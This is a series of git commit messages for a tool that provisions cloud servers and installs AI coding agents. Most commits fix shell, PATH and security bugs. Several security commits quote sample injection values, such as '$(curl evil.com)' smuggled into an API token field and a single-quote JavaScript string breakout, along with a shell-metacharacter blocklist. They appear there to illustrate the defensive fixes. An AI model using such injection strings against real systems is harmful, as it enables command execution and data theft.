Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: symlink n-installed Node.js v22 over apt v18 to prevent shadowing
n installs Node.js v22 to /usr/local/bin/node but apt's v18 at
/usr/bin/node can shadow it in non-interactive SSH sessions. After
n 22, symlink the new binaries over the apt ones so v22 is always
resolved. Also fix hcloud CLI token extraction for new TOML format.
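The shadowing fix boils down to `ln -sf` over the apt binaries. A self-contained simulation in a temp dir (stub scripts stand in for the real node binaries):

```shell
# Simulate: apt's v18 at usr/bin shadows n's v22 at usr/local/bin until
# we symlink the n-installed binary over the apt one.
tmp=$(mktemp -d)
mkdir -p "$tmp/usr/local/bin" "$tmp/usr/bin"
printf '#!/bin/sh\necho v22\n' > "$tmp/usr/local/bin/node"
printf '#!/bin/sh\necho v18\n' > "$tmp/usr/bin/node"
chmod +x "$tmp/usr/local/bin/node" "$tmp/usr/bin/node"

ln -sf "$tmp/usr/local/bin/node" "$tmp/usr/bin/node"
"$tmp/usr/bin/node"   # → v22
```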
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review, add curl timeouts to trigger workflows
- Fix ssh_run_server command injection concern: use single-quoted
path_prefix so $HOME/$PATH expand remotely, not locally
- Add --connect-timeout 15 --max-time 30 to trigger workflows to
prevent 5-min hangs when server streams responses
- Handle 409 (dedup) as success — expected when cron fires every 15min
but cycles take 35min
- Reduce workflow timeout-minutes from 5 to 2
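The 409-as-success rule can be expressed as a small status check (the curl line in the comment mirrors the flags above; `is_trigger_success` is a hypothetical helper name):

```shell
# Treat 2xx and 409 (dedup: cron fired while a cycle is still running)
# as success; everything else is a real failure.
is_trigger_success() {
  case "$1" in
    2??|409) return 0 ;;
    *)       return 1 ;;
  esac
}

# status=$(curl -s -o /dev/null -w '%{http_code}' \
#            --connect-timeout 15 --max-time 30 "$url")
is_trigger_success 201 && echo "201 ok"
is_trigger_success 409 && echo "409 ok (dedup)"
is_trigger_success 500 || echo "500 fails"
```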
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* feat: add QA upgrade — macOS compat linter, per-agent mock assertions
Layer 1: macOS compat linter (test/macos-compat.sh)
- 12 rules (MC001–MC012) catching bash 3.2 incompatibilities
- Detects: base64 -w0 file args, non-portable echo flags, source <(),
((var++)), read -d, nounset flag, sed -i, date %N, local -n,
declare -A, ${var,,}, and |&
- Added to CI lint.yml in warn-only mode for burn-in
- Integrated as Phase 0.5 in qa-dry-run.sh
Layer 2: Per-agent mock assertions
- test/fixtures/_shared_agent_assertions.sh with install checks
for all 15 agents (claude, openclaw, aider, goose, etc.)
- Integrated into test/mock.sh via _run_agent_assertions()
Also includes branch fixes:
- Fix base64 -w0 to use stdin redirect (aws, daytona, fly)
- Fix fly/openclaw to use npm install instead of broken curl|bash
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add E2E test harness and integrate into QA pipeline
Add test/e2e.sh — a full E2E test harness that provisions real servers,
installs agents, and verifies setup across all clouds. Features:
- Smoke test (one canary agent per cloud) and full matrix modes
- Credential auto-detection for 8 clouds
- Per-cloud preflight validation (sequential) then parallel agent tests
- Stale server cleanup, timing history, cross-cloud comparison
- Auto-fix and optimization phases via Claude agents
- macOS bash 3.2 compatible
Integrate E2E as Phase 5 in both qa-cycle.sh and qa-dry-run.sh:
- Runs after mock tests pass, gated on cloud credentials
- Phase 5b auto-fixes failures using per-agent worktree branches
- Parses results and includes in QA summary
Also fixes:
- shared/common.sh: honour SPAWN_NON_INTERACTIVE=1 in safe_read()
- aws/lib/common.sh: fix SSH key import (use cat instead of base64,
handle race condition on concurrent imports)
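The `safe_read()` change can be sketched as (argument layout and default handling are assumptions, only the env var name is from this commit):

```shell
safe_read() {   # $1 = prompt, $2 = default
  if [ "${SPAWN_NON_INTERACTIVE:-0}" = "1" ]; then
    REPLY=$2    # never block on stdin during CI/E2E runs
    return 0
  fi
  printf '%s' "$1"
  read -r REPLY
  [ -n "$REPLY" ] || REPLY=$2
}

SPAWN_NON_INTERACTIVE=1
safe_read "Spawn name: " "my-dev-box"
echo "$REPLY"
```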
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* security: prevent command injection in key-request.sh env var loading
Fixes #1405
**Why:**
The _try_load_env_var function loaded API tokens from ~/.config/spawn/{cloud}.json
without validating the value for shell metacharacters. If an attacker could write
malicious config files (e.g., {"HCLOUD_TOKEN": "$(curl evil.com)"}), the injected
commands would execute when the variable was later used in unquoted contexts.
**Changes:**
- Added regex validation in _try_load_env_var (line 88-91) to reject values
containing shell metacharacters: ; ' " < > | & $ ` \ ( )
- Matches the same pattern used in validate_api_token() from shared/common.sh
- Now returns error and logs security warning if malicious characters detected
**Impact:**
Blocks command injection attacks via config file poisoning. API tokens must now
be clean alphanumeric strings (as they should be from legitimate providers).
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: strengthen key-request.sh regex to block all shell metacharacters
Address security review feedback from PR #1415.
**Changes:**
- Replace blocklist regex with whitelist: `^[a-zA-Z0-9._/@-]+$`
- Now blocks `!`, `{`, `}`, `#`, newlines, tabs, and all other metacharacters
- Update comment to clarify defense-in-depth purpose
- Change error message to match validate_api_token() pattern
**Why whitelist approach:**
API tokens from legitimate cloud providers only contain alphanumeric
characters plus safe chars (-, _, ., /, @). Whitelist is more robust
than trying to enumerate all dangerous shell metacharacters.
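The whitelist can be expressed as a case glob too, which also runs under bash 3.2 / plain sh (the function name matches `validate_api_token` from shared/common.sh; this glob form is a sketch equivalent to the regex `^[a-zA-Z0-9._/@-]+$`):

```shell
validate_api_token() {
  case "$1" in
    "" | *[!a-zA-Z0-9._/@-]*) return 1 ;;  # empty, or any char off-whitelist
    *) return 0 ;;
  esac
}

validate_api_token 'fm2_abc.123/x@y-z' && echo "accepted"
validate_api_token 'x$(curl evil.com)' || echo "rejected"
```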
-- pr-maintainer
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: fix medium severity findings from scan #763
Addresses remaining medium-severity security findings from issue #763:
1. **Path traversal in invalidate_cloud_key** (shared/key-request.sh)
- Removed dots from provider name validation regex
- Changed from ^[a-z0-9][a-z0-9._-]{0,63}$ to ^[a-z0-9][a-z0-9_-]{0,63}$
- Prevents path traversal via sequences like "foo..bar"
2. **Background process timeout** (shared/key-request.sh)
- Wrapped fire-and-forget key request in timeout 15s
- Prevents leaked subprocess if curl hangs beyond --max-time
3. **Rate limiting IP spoofing** (.claude/skills/setup-agent-team/key-server.ts)
- Switched from x-forwarded-for header to server.requestIP(req)
- Uses actual connection IP instead of spoofable header
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: add macOS portability for timeout command
Address review feedback from security team - timeout command is not available
on macOS by default. Added fallback pattern that:
- Uses timeout on Linux (prevents subprocess leak)
- Falls back to curl --max-time only on macOS
This ensures request_missing_cloud_keys() works on both platforms.
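The fallback pattern looks roughly like this (helper name is illustrative):

```shell
# Use timeout(1) where it exists (Linux); on macOS run the command directly
# and rely on its own deadline flags (e.g. curl --max-time).
run_with_timeout() {
  secs=$1; shift
  if command -v timeout >/dev/null 2>&1; then
    timeout "$secs" "$@"
  else
    "$@"
  fi
}

run_with_timeout 15 echo "request sent"
```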
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: fix command injection vulnerability in key-request.sh
Fixes the critical command injection vulnerability identified in security review.
Changes:
- Use positional parameters ($1, $2, $3) instead of variable interpolation in bash -c
- Pass variables via -- delimiter to prevent shell escaping issues
- Replace echo with printf for proper formatting (macOS bash 3.x compat)
- Maintain timeout wrapper on Linux and curl --max-time fallback on macOS
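The positional-parameter pattern in miniature (the hostile token is a demo value):

```shell
# Untrusted values travel as positional parameters after --, so the inner
# shell substitutes them as data and never re-parses them as code.
token='$(touch /tmp/pwned)'
sh -c 'printf "token=%s\n" "$1"' -- "$token"
# prints the literal $(touch /tmp/pwned); nothing executes
```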
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Implements spawn name feature (#1372) to improve UX:
- Add optional spawn name prompt in interactive mode
- Pass spawn name via SPAWN_NAME env var to shell scripts
- Shell scripts use spawn name as default for resource names
- Store spawn name in history for future reference
- Bump CLI version to 0.4.0
The spawn name is prompted before agent/cloud selection and
automatically used as the default for platform-specific resource
names (server name on Hetzner, sprite name on Sprite, etc.).
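A minimal sketch of the name-to-default derivation (the exact rules used by the CLI may differ; this shows the kebab-case idea):

```shell
# Lowercase, collapse runs of non-alphanumerics to single hyphens,
# trim hyphens from the ends.
to_kebab() {
  printf '%s' "$1" \
    | tr '[:upper:]' '[:lower:]' \
    | tr -cs 'a-z0-9' '-' \
    | sed 's/^-*//; s/-*$//'
}

to_kebab "My Dev Box"   # → my-dev-box
```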
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: re-prompt on taken Fly.io app names + timeout run_server
Two fixes for Fly.io UX:
1. When app name is globally taken by another user, re-prompt instead
of failing. Returns exit code 2 from _fly_create_app so create_server
can loop with a new name.
2. run_server now has a 5-minute timeout (portable, no coreutils needed)
to prevent indefinite hangs like the 3-hour SSH session stall.
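The exit-code-2 contract drives a loop like this (`_fly_create_app` is mocked here so the sketch runs standalone; the real version re-prompts instead of appending a suffix):

```shell
attempts=0
_fly_create_app() {   # mock: first name is globally taken (rc 2), second works
  attempts=$((attempts + 1))
  if [ "$attempts" -eq 1 ]; then return 2; else return 0; fi
}

name="my-app"
while true; do
  _fly_create_app "$name" && break
  rc=$?
  if [ "$rc" -eq 2 ]; then
    name="${name}-2"          # real flow: prompt the user for a new name
  else
    echo "create failed ($rc)" >&2; exit "$rc"
  fi
done
echo "created $name"
```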
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: wait for SSH before installing tools on Fly.io
The previous wait_for_cloud_init immediately ran apt-get via fly ssh
console on a machine that wasn't SSH-reachable yet, causing indefinite
hangs. Now:
1. _fly_wait_for_ssh polls with a 30s-timeout echo until SSH responds
2. Shows progress at each step instead of suppressing all output
3. Each run_server call has an explicit timeout (10min for apt, 2min
for bun, 30s for PATH exports)
4. Retries package install once on timeout
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: run fly ssh console in foreground, not background
fly ssh console breaks when backgrounded with & — it needs a foreground
process to establish the connection. Reverted to foreground execution
and use timeout/gtimeout when available (Linux/CI). On macOS where
timeout isn't available, the user can Ctrl+C hung commands.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: ensure bun PATH is available in non-interactive fly ssh sessions
Ubuntu's default .bashrc returns early for non-interactive shells,
so "source ~/.bashrc && bun install -g openclaw" silently fails —
the PATH line at the bottom of .bashrc is never reached.
Fix by prepending ~/.bun/bin to PATH in run_server() so all remote
commands have access to tools installed during wait_for_cloud_init.
Also fix spawn_agent to explicitly handle agent_install failure
instead of relying on set -e (which exits silently).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: validate saved API tokens before use
Tokens loaded from config files (e.g. ~/.config/spawn/fly.json) were
never validated, so expired or revoked tokens would silently pass through
and only fail at the point of use (e.g. app creation). Now the provider's
test function runs on config-file tokens too, falling through to a fresh
prompt if validation fails.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: handle FlyV1 token auth scheme for Fly.io Machines API
Fly.io dashboard tokens use the format "FlyV1 fm2_..." where "FlyV1" is
the authorization scheme itself, not a Bearer token prefix. The script was
always sending "Authorization: Bearer FlyV1 fm2_..." which the API rejects
with "token validation error". Now detects FlyV1-prefixed tokens and sends
them as "Authorization: FlyV1 fm2_..." using custom auth headers.
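The scheme detection reduces to a prefix check (helper name is illustrative):

```shell
# Dashboard tokens carry their own scheme ("FlyV1 fm2_..."); everything
# else is sent as a Bearer token.
auth_header_for() {
  case "$1" in
    "FlyV1 "*) printf 'Authorization: %s\n' "$1" ;;
    *)         printf 'Authorization: Bearer %s\n' "$1" ;;
  esac
}

auth_header_for "FlyV1 fm2_abc123"   # → Authorization: FlyV1 fm2_abc123
auth_header_for "fo1_xyz"            # → Authorization: Bearer fo1_xyz
```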
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: make refactor service actually run reliably
Three fixes for the refactor workflow that was producing zero PRs:
1. community-coordinator: Gemini → Sonnet — Gemini doesn't support
the Task tool, causing a respawn on every single cycle
2. Monitoring loop: replace "sleep 5" (which drifted to sleep 30)
with explicit short-sleep instructions and CRITICAL rule that
every turn must include a tool call to stay alive
3. Lifecycle management: explicit shutdown sequence with retry,
preventing early exit that orphans teammates
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Fixes #1354 - users experienced a ~30s delay with "gateway not connected"
errors when trying to use OpenClaw immediately after launch.
Root cause: gateway takes time to bind to port 18789, but TUI launched
after only 2 seconds.
Solution: Add wait_for_openclaw_gateway() helper that polls the gateway
port (max 30s) before launching TUI, ensuring immediate usability.
Changes:
- shared/common.sh: Add wait_for_openclaw_gateway() function
- All openclaw.sh scripts (10 files): Replace sleep 2 with gateway readiness check
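The readiness check is a bounded poll. Sketch with a mocked probe so it runs standalone (the real probe would test port 18789, e.g. with `nc -z 127.0.0.1 18789`):

```shell
wait_for_openclaw_gateway() {   # $1 = max seconds to wait (default 30)
  deadline=$(( $(date +%s) + ${1:-30} ))
  until _gateway_up; do
    if [ "$(date +%s)" -ge "$deadline" ]; then return 1; fi
    sleep 1
  done
}

polls=0
_gateway_up() {   # mock: gateway comes up on the 3rd poll
  polls=$((polls + 1))
  [ "$polls" -ge 3 ]
}

wait_for_openclaw_gateway 30 && echo "gateway ready"
```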
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Make install_agent() check exit codes and fail fast when installation
commands return non-zero. Previously, the function would silently
continue even when installations failed due to bash || operators
returning 0.
This fix ensures that installation failures (network timeouts, missing
dependencies, package not found) are caught immediately with actionable
error messages instead of confusing runtime errors during session launch.
Affected ~30 agent scripts using patterns like:
- pip install X 2>/dev/null || pip3 install X
- command -v bun && bun install X || npm install X
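The fail-fast shape, in miniature (wrapper name is hypothetical):

```shell
# Run an install command and surface a non-zero status immediately,
# instead of letting a trailing `|| fallback` swallow it.
run_install_step() {
  "$@" || { echo "error: install step failed: $*" >&2; return 1; }
}

run_install_step true  && echo "step ok"
run_install_step false || echo "step failed, aborting install"
```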
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Three reliability improvements:
1. OAuth session cleanup: Verify PID still exists before killing to prevent
accidentally killing unrelated processes if PID is reused by the OS.
Uses kill -0 check before sending SIGTERM.
2. Float arithmetic fallback: Check for python3 availability before using it
for fractional POLL_INTERVAL support. Falls back to integer seconds with
explicit comment about potential early timeout.
3. Exit code preservation: Add clarifying comment about exit code capture
timing in refactor.sh cleanup trap (already correct, now documented).
Agent: code-health
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: add error logging to empty catch blocks in test helpers
Previously, test helper functions had 14 empty catch blocks that
silently swallowed all errors during cleanup operations (reading and
deleting temporary stderr files).
This change adds error logging that:
- Allows expected errors (ENOENT for missing files, exit code 1 for cat)
- Logs unexpected errors to console for debugging
This improves test reliability by surfacing unexpected filesystem or
permission errors that could indicate real problems, while still
allowing the intended best-effort cleanup behavior.
Fixes: Empty catch blocks in 6 test files
Impact: Better test debugging and error visibility
Agent: code-health
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: improve error handling in Python fallback and directory deletion
1. Python arithmetic fallback (shared/common.sh:713):
- Changed from: || echo "$((elapsed + 1))"
- Changed to: explicit if/else with error detection
- Impact: Python errors are now properly caught instead of masked by ||
2. Unvalidated directory deletion (cli/install.sh:142):
- Added path validation before rm -rf
- Checks: path is within dest directory AND directory exists
- Impact: Prevents accidental deletion if variables are malformed
Both changes improve safety and error visibility without breaking
existing functionality.
Agent: code-health
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Prevents potential code injection if malicious parameters containing
single quotes are passed to _generate_oauth_server_script(). The
function embeds bash variables directly into a Node.js script string
using single-quoted JS strings. Without escaping, a crafted parameter
like "foo'; malicious(); '" could break out of the string context.
While current callers use safe values (randomUUID, tempfile paths,
HTML constants), defense-in-depth requires sanitizing at the point
of use to prevent future regressions if callers change.
Fixes: CWE-94 (Code Injection)
Severity: HIGH
Impact: Remote code execution if attacker controls OAuth state token,
file paths, or HTML content
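The sanitization amounts to escaping backslashes and single quotes before interpolation (a sketch; the real function may escape more):

```shell
# Escape for embedding in a single-quoted JS string literal:
# backslashes first, then single quotes, so neither can close the string.
escape_for_js() {
  printf '%s' "$1" | sed -e 's/\\/\\\\/g' -e "s/'/\\\\'/g"
}

escape_for_js "foo'; malicious(); '"
```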
Agent: security-auditor
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Refactored two high-complexity functions to improve maintainability:
1. shared/common.sh: Extract install_claude_code() into 5 focused helpers:
- _finalize_claude_install: Setup shell integration
- _verify_claude_installed: Check if installation succeeded
- _install_via_curl: Curl installer method
- _ensure_nodejs_runtime: Node.js runtime setup
- _install_via_bun: Bun installer method
Main function now reads as a clear sequence of steps.
2. cli/src/commands.ts: Simplify credential checking in printQuickStart:
- Extract checkAllCredentialsReady() for clarity
- Extract printAuthVariableStatus() to handle auth var display
- Extract buildCloudCommandHint() for cloud hint formatting
Reduces complexity and improves readability.
All 80 tests pass. No functional changes.
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Improves codebase reliability by adding critical safety validations:
1. **cleanup_oauth_session**: Added path validation before rm -rf
- Prevents accidental deletion if oauth_dir is empty, /, or /tmp
- Validates path starts with /tmp/ and is not just /tmp itself
- Prevents catastrophic system damage from failed mktemp
2. **_init_oauth_session**: Added mktemp failure detection
- Checks if mktemp -d succeeded before using oauth_dir
- Returns error with actionable message if temp dir creation fails
- Prevents empty oauth_dir from propagating to rm -rf
3. **refactor.sh SPAWN_ISSUE validation**: Strengthened regex
- Changed from ^[0-9]+$ to ^[1-9][0-9]*$
- Prevents SPAWN_ISSUE="0" from creating issue-0 worktrees
- Ensures issue numbers are positive integers (>= 1)
These fixes prevent potential data loss from edge cases in OAuth
cleanup and refactor service issue handling.
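A sketch of the rm -rf guard (the `..` rejection is an extra precaution added here, not stated in the commit):

```shell
# Only delete paths strictly under /tmp/; refuse "", "/", "/tmp" itself,
# and anything containing ".." (path traversal).
cleanup_oauth_session() {
  case "$1" in
    *..*) echo "refusing to delete '$1'" >&2; return 1 ;;
    /tmp/?*) rm -rf "$1" ;;
    *) echo "refusing to delete '$1'" >&2; return 1 ;;
  esac
}

cleanup_oauth_session ""     || echo "blocked empty path"
cleanup_oauth_session "/tmp" || echo "blocked /tmp"
d=$(mktemp -d /tmp/oauth.XXXXXX) || exit 1   # mirrors the mktemp check
cleanup_oauth_session "$d" && echo "removed session dir"
```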
Agent: code-health
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
HIGH severity: Three functions used hardcoded /tmp/env_config for uploading
API keys, creating a TOCTOU race condition where attackers on multi-user
systems could create symlinks to exfiltrate OPENROUTER_API_KEY and other
credentials.
Fixed by using unpredictable temp file names with mktemp-derived randomness,
matching the secure pattern in write_remote_file_via_callback().
Affected functions:
- inject_env_vars_with_ssh() (line 1094)
- inject_env_vars_local() (line 1128)
- inject_env_vars_cb() (line 1363)
Agent: security-auditor
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
- Fix race condition in cleanup_oauth_session: Kill process group to prevent zombie OAuth server processes
- Add mktemp failure handling in _init_oauth_session: Prevents undefined behavior when /tmp is full or inaccessible
- Add env var name validation in generate_env_config: Prevents shell injection via malformed KEY=value pairs
Agent: code-health
Co-authored-by: test-engineer <agent@spawn.local>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Wire up connection tracking across all 10 clouds so users can reconnect
to and delete previously spawned servers via `spawn list` and `spawn delete`.
Phase 1 - Connection tracking:
- Extend save_vm_connection() with cloud and metadata params
- Add save_vm_connection to create_server() in all cloud libs
- Extend VMConnection with cloud, deleted, deleted_at, metadata fields
Phase 2 - Delete via interactive picker:
- Add "Delete this server" option to spawn list picker
- Build delete scripts that reuse each cloud's destroy_server()
- Confirmation UX with spinner feedback
- Soft-delete marking in history (deleted records show [deleted])
Phase 3 - Standalone delete command:
- spawn delete (aliases: rm, destroy) with interactive picker
- Filter support: spawn delete -a <agent> -c <cloud>
Also improves reconnect hints for Fly (fly ssh console) and
Daytona (daytona ssh) connections.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Ubuntu's default .bashrc has an interactive-shell guard that exits
early in non-interactive contexts. When SSH runs a command string
(ssh -t user@host -- "cmd"), the shell is non-interactive, so
env vars appended to .bashrc are never loaded — causing Claude Code
to start without OpenRouter credentials and get rejected.
Fix: write env vars to ~/.spawnrc and have .bashrc/.zshrc source it.
Launch commands source ~/.spawnrc directly, bypassing the guard.
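The mechanism, sketched in a sandboxed `$HOME` (variable name is a demo value; the rc-file wiring mirrors the description above):

```shell
export HOME="$(mktemp -d)"   # sandbox so the sketch has no side effects
touch "$HOME/.bashrc"

# write env vars to ~/.spawnrc, then have .bashrc source it
printf 'export SPAWN_DEMO_KEY=sk-demo\n' >> "$HOME/.spawnrc"
grep -q spawnrc "$HOME/.bashrc" \
  || printf '[ -f ~/.spawnrc ] && . ~/.spawnrc\n' >> "$HOME/.bashrc"

# a launch command sources ~/.spawnrc directly, bypassing the
# interactive-shell guard at the top of Ubuntu's .bashrc
sh -c '. "$HOME/.spawnrc" && echo "$SPAWN_DEMO_KEY"'
```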
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The npm/fnm fallback was causing multiple issues:
- bun installed claude but verification ran `claude --version` which
needs node (bun-installed claude has #!/usr/bin/env node shebang)
- fnm's `eval "$(fnm env)"` corrupts PATH when written to rc files
- fnm installs node in a dir that requires eval to access
Simplified to two methods:
1. curl installer (standalone binary, no runtime needed)
2. bun i -g (installs to ~/.bun/bin/)
Removed: npm method, fnm/nodesource node installers, fnm PATH logic.
Changed verification from `command -v claude && claude --version` to
just `command -v claude` (avoids needing node just to verify).
Also: cleaned up claude_path (removed fnm references), kept stale
.bash_profile cleanup.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Root cause: the launch command did `source ~/.bashrc; source ~/.zshrc; claude`.
The .zshrc contains `eval "$(fnm env)"` which outputs PATH with literal
"$PATH" in quotes instead of expanding it, destroying the entire PATH.
Confirmed via debugging:
- `ssh -t ... 'export PATH=...; which claude'` → works (/root/.bun/bin/claude)
- `ssh -t ... 'export PATH=...; source ~/.zshrc; which claude'` → "command not found"
- `source ~/.zshrc; echo $PATH` → `"/run/user/0/fnm_multishells/...":"$PATH"` (broken)
Fix:
- Remove `source ~/.bashrc` and `source ~/.zshrc` from ALL launch commands
- ssh -t creates a pseudo-terminal, so bash auto-sources .bashrc for env vars
- Explicit PATH export is all we need for finding the claude binary
- Remove fnm eval snippet from _finalize_claude_install (it poisoned rc files)
- Also: clean up stale ~/.bash_profile, fix cloud-init PATH, move node
install after bun attempt
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Stop writing env vars to ~/.profile and ~/.bash_profile — only write to
.bashrc and .zshrc. The .profile approach caused issues because login
shells source it inconsistently across distros, and creating .bash_profile
makes bash -l skip .profile entirely.
Replace `bash -lc claude` launch commands with explicit PATH export +
source pattern across all cloud providers. This ensures claude is found
regardless of shell initialization quirks.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
On Ubuntu/Debian, ~/.bash_profile doesn't exist by default. When bash
starts as a login shell (bash -l), it sources the FIRST file it finds
from: ~/.bash_profile, ~/.bash_login, ~/.profile. Since only ~/.profile
exists, that's what gets sourced — and ~/.profile sets up the standard
PATH (/usr/bin, /bin, etc.) and sources ~/.bashrc.
Our inject_env_vars_* functions and _finalize_claude_install were writing
to ~/.bash_profile and ~/.zprofile (either via touch+append or via
for-loop over all rc files). Creating ~/.bash_profile caused bash -l to
source it INSTEAD of ~/.profile, completely losing the standard PATH
setup. After deployment, even basic commands like `ls` would fail.
Fix: Only write to ~/.profile, ~/.bashrc, ~/.zshrc across all clouds
(shared, fly, sprite). These are the standard files that work correctly
on all Linux distros without breaking the shell initialization chain.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>